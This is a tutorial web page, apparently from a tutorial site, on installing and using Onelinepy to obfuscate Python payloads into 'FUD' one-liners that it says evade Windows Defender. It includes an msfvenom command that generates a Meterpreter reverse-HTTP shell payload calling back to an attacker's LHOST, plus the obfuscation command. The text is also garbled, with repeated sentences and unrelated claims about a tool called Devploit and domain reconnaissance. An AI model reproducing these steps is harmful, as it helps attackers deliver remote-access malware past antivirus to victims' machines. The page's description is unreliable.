Open In App

Onelinepy – Python Obfuscator To Generate One-Liners And FUD Payloads

Last Updated : 18 Jul, 2021
Improve
Improve
Like Article
Like
Save
Share
Report

Onelinepy is a free and open-source tool available on GitHub.  Onelinepy is used to Generate One-Liners And FUD Payloads. Devploit is used to generate FUD Payloads in websites and webapps. This tool can be used to get information about our target(domain). We can target any domain using Onelinepy. The interactive console provides a number of helpful features, such as command completion and contextual help. This tool is written in python language. You must have python language installed in your Kali Linux to use this tool.  Python Obfuscator To Generate One-Liners And FUD Payloads. The Obfuscated Payload works against Windows Defender.  FUD meterpreter python payload can generate python payload.

Onelinepy - Python Obfuscator To Generate One-Liners And FUD Payloads

Installation:

Step 1: Use the following command to install the tool from Github.

git clone https://github.com/spicesouls/onelinepy
cd onelinepy

Step 2: Now you have to give the permission of the execution to the tool.

chmod +x setup.sh
./setup.sh

Step 3: Now run the tool using the following command.

onelinepy

Now the tool is running successfully Now we will example to run the tool.

Usages:

Example 1: Use the onelinepy run the tool to create FUD Meterpreter Python Payload.

onelinepy -m /one_line/base64 –script payload.txt -i 3 –output obfustucated_payload.txt

This Obfuscated Payload works against Windows 10 Defender.

Example 2: Use the onelinepy run the tool to create FUD Meterpreter Python Payload.

msfvenom –payload python/meterpreter_reverse_http LHOST=… LPORT=… > payload.txt

This meterpreter_reverse_http payload is created for LHOST AND LPORT using msfvenom. Python Obfuscator To Generate One-Liners And FUD Payloads. The Obfuscated Payload works against Windows Defender.  FUD meterpreter python payload can generate python payload.


Like Article
Suggest improvement
Previous
Next
Share your thoughts in the comments

Similar Reads